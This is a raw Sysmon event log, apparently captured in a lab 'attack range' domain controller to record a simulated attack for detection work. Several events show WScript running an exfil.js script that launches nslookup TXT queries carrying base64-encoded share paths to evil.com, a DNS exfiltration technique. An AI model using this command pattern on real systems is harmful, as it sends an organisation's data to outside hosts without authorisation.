14:21:25.218{2E1864BB-18E5-629A-AA42-000000005F02}78247996C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-AB42-000000005F02}5740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.218{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-AB42-000000005F02}5740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.218{2E1864BB-18E5-629A-A942-000000005F02}61761960C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-AB42-000000005F02}5740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.229{2E1864BB-18E5-629A-AB42-000000005F02}5740C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-A942-000000005F02}6176C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwwgr.tmp 2>&1 354300x8000000000000000206544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.724{00000000-0000-0000-0000-000000000000}7708<unknown process>-udpfalsefalse127.0.0.1-50450-false127.0.0.1-53domain 354300x8000000000000000206543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.724{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50450- 354300x8000000000000000206542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.723{00000000-0000-0000-0000-000000000000}7708<unknown process>-udptruefalse127.0.0.1-50450-false127.0.0.1-53domain 354300x8000000000000000206541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.723{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50449- 354300x8000000000000000206540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.723{00000000-0000-0000-0000-000000000000}7708<unknown process>-udptruefalse127.0.0.1-50449-false127.0.0.1-53domain 354300x8000000000000000206539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.723{00000000-0000-0000-0000-000000000000}7708<unknown process>-udpfalsefalse127.0.0.1-50448-false127.0.0.1-53domain 354300x8000000000000000206538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.723{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50448- 354300x8000000000000000206537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.722{00000000-0000-0000-0000-000000000000}7708<unknown process>-udptruefalse127.0.0.1-50448-false127.0.0.1-53domain 354300x8000000000000000206536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.565{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61746-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.564{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61746-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.564{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50447- 354300x8000000000000000206533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.563{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50446- 354300x8000000000000000206532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.563{00000000-0000-0000-0000-000000000000}5352<unknown process>-udpfalsefalse127.0.0.1-50445-false127.0.0.1-53domain 354300x8000000000000000206531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.563{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50445- 354300x8000000000000000206530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.563{00000000-0000-0000-0000-000000000000}5352<unknown process>-udptruefalse127.0.0.1-50445-false127.0.0.1-53domain 354300x8000000000000000206529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.863{00000000-0000-0000-0000-000000000000}3588<unknown process>-udpfalsefalse127.0.0.1-50444-false127.0.0.1-53domain 354300x8000000000000000206528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.863{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61393-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61393-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.861{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50444- 354300x8000000000000000206525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.861{00000000-0000-0000-0000-000000000000}3588<unknown process>-udpfalsefalse127.0.0.1-50443-false127.0.0.1-53domain 354300x8000000000000000206524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.861{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50443- 354300x8000000000000000206523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.861{00000000-0000-0000-0000-000000000000}3588<unknown process>-udptruefalse127.0.0.1-50443-false127.0.0.1-53domain 354300x8000000000000000206522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{00000000-0000-0000-0000-000000000000}3588<unknown process>-udpfalsefalse127.0.0.1-50442-false127.0.0.1-53domain 354300x8000000000000000206521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.859{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50442- 354300x8000000000000000206520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.859{00000000-0000-0000-0000-000000000000}3588<unknown process>-udptruefalse127.0.0.1-50442-false127.0.0.1-53domain 354300x8000000000000000206519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.716{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61985-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.708{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61985-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.707{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50441- 354300x8000000000000000206516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.706{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50440- 354300x8000000000000000206515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.706{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50439- 354300x8000000000000000206514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.706{00000000-0000-0000-0000-000000000000}4928<unknown process>-udptruefalse127.0.0.1-50439-false127.0.0.1-53domain 10341000x8000000000000000206513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.203{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-AA42-000000005F02}7824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.203{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-AA42-000000005F02}7824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.203{2E1864BB-18E5-629A-AA42-000000005F02}78247996C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-A942-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.187{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-AA42-000000005F02}7824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.187{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.187{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.187{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.187{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.187{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-A942-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.187{2E1864BB-18E0-629A-6742-000000005F02}39766660C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-A942-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.190{2E1864BB-18E5-629A-A942-000000005F02}6176C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwwgr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.171{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlriox.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.168{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=727B671C0A546B538EC2C4B39144125C,SHA256=D4F7D4A2BA0529488EA19F57DF8E81E3162BD8A63A1753A74E4C8BEB50C08192,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.150{2E1864BB-18E5-629A-A742-000000005F02}75566848C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-A842-000000005F02}6092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 